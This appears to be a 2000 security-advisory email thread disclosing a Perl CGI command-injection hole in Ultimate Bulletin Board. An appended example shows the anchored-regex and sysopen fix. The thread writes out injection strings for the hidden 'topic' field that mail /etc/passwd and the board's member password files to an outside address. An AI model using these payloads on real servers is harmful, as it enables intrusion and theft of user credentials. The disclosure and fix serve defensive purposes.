It works on the full version also...
Slightly different syntax:
topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]|
(note the ../ on the Members. You have to go up a directory to get the
file. Maybe you could stop it via simple folder permissions??)
Regards,
Kevin Hillabolt
----- Original Message -----
From: "Sergei A. Golubchik" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.
> Hello.
>
> Writing cgi scripts in perl is simple. It's also rather safe,
> providing authors follow very simple instructions. But they don't.
>
> Browsing some site, I found that their forums were based not on home-made
> scripts, but rather on a commercial software product. Hey, said I to
> myself, remember that story about the pcweek hack? They use the commercial
> package photoads. Let's look at what that Ultimate Bulletin Board by
> Infopop is.
>
> I grabbed the freeware version from http://www.ultimatebb.com and
> after 10 minutes of grepping found these lines:
>
> ubb_library.pl:901-902
> if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
> open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
>
> (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
> writing it? Girls?)
>
> And the $ThreadFile takes its value directly from the hidden (hmm!)
> field `topic'.
>
> So when I filled the form with
> topic='012345.ubb|mail [EMAIL PROTECTED] </etc/passwd|'
> It happily gives me /etc/passwd. And
> topic='012345.ubb|cat Members/*|mail [EMAIL PROTECTED]|'
> shows all users of the bulletin board, and their passwords too (in
> cleartext!).
>
> So one should only open the "reply" form in the forum, save it to disk,
> and set the topic field to whatever he wants. And this stupid UBB (at least
> the freeware version) doesn't keep logs (except for the so-called hacklog,
> which is used when the condition above is not met).
>
> The fix is obvious. But the rule of thumb is "do not use magic perl open".
> At least in cgi scripts. If you want to open a regular file, sysopen does
> the trick as well.
>
> And again: CHECK EVERYTHING!
>
> Regards,
> SerG.
>
> P.S. Vendor was notified.
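The fix Sergei calls obvious, written out as an added example (not UBB's code and not from either poster): anchor the pattern so it must match the whole `topic' value, open the thread with sysopen so `|`, `<` and `>` are never interpreted, and log what was rejected. The $ForumsPath layout, the function names and the demo directory are assumptions.

```perl
#!/usr/bin/perl
# Added example: validate the hidden `topic' field before touching the
# filesystem, and read the thread with sysopen instead of two-argument open.
# Function names and $ForumsPath are assumptions, not UBB's own code.
use strict;
use warnings;
use Fcntl qw(O_RDONLY);

my $ForumsPath = '/tmp/ubb-demo/Forums';   # assumed layout, as in the post

# Returns the validated file name or undef. The anchors are the whole fix:
# an unanchored /\d\d\d\d\d\d\.ubb/ matches anywhere inside the string, so
# "012345.ubb|cat Members/*|" passes it. (The capture also untaints under -T.)
sub valid_thread_file {
    my ($topic) = @_;
    return undef unless defined $topic;
    return $1 if $topic =~ /^(\d{6}\.ubb)\z/;
    return undef;
}

sub log_bad_request {
    my ($topic) = @_;
    my $shown = defined $topic ? $topic : '<undef>';
    $shown =~ s/[^\x20-\x7e]/?/g;            # keep the log line itself clean
    warn sprintf "[%s] rejected topic=%s\n", scalar localtime, $shown;
}

# Open a thread read-only. sysopen takes a plain path and explicit flags, so
# pipe and redirection characters in the name have no special meaning.
sub open_thread {
    my ($number, $topic) = @_;
    my $file = valid_thread_file($topic);
    unless (defined $file && defined $number && $number =~ /^\d+\z/) {
        log_bad_request($topic);
        return undef;
    }
    my $path = "$ForumsPath/Forum$number/$file";
    sysopen(my $fh, $path, O_RDONLY) or return undef;
    return $fh;
}

# Constructed inputs: the strings quoted in the thread are rejected, a plain
# thread name is accepted.
for my $t ('012345.ubb', '012345.ubb|mail x </etc/passwd|',
           '012345.ubb|cat Members/*|', '012345.cgi|cat ../Members/*|') {
    printf "%-36s -> %s\n", $t, defined valid_thread_file($t) ? 'accepted' : 'rejected';
}
```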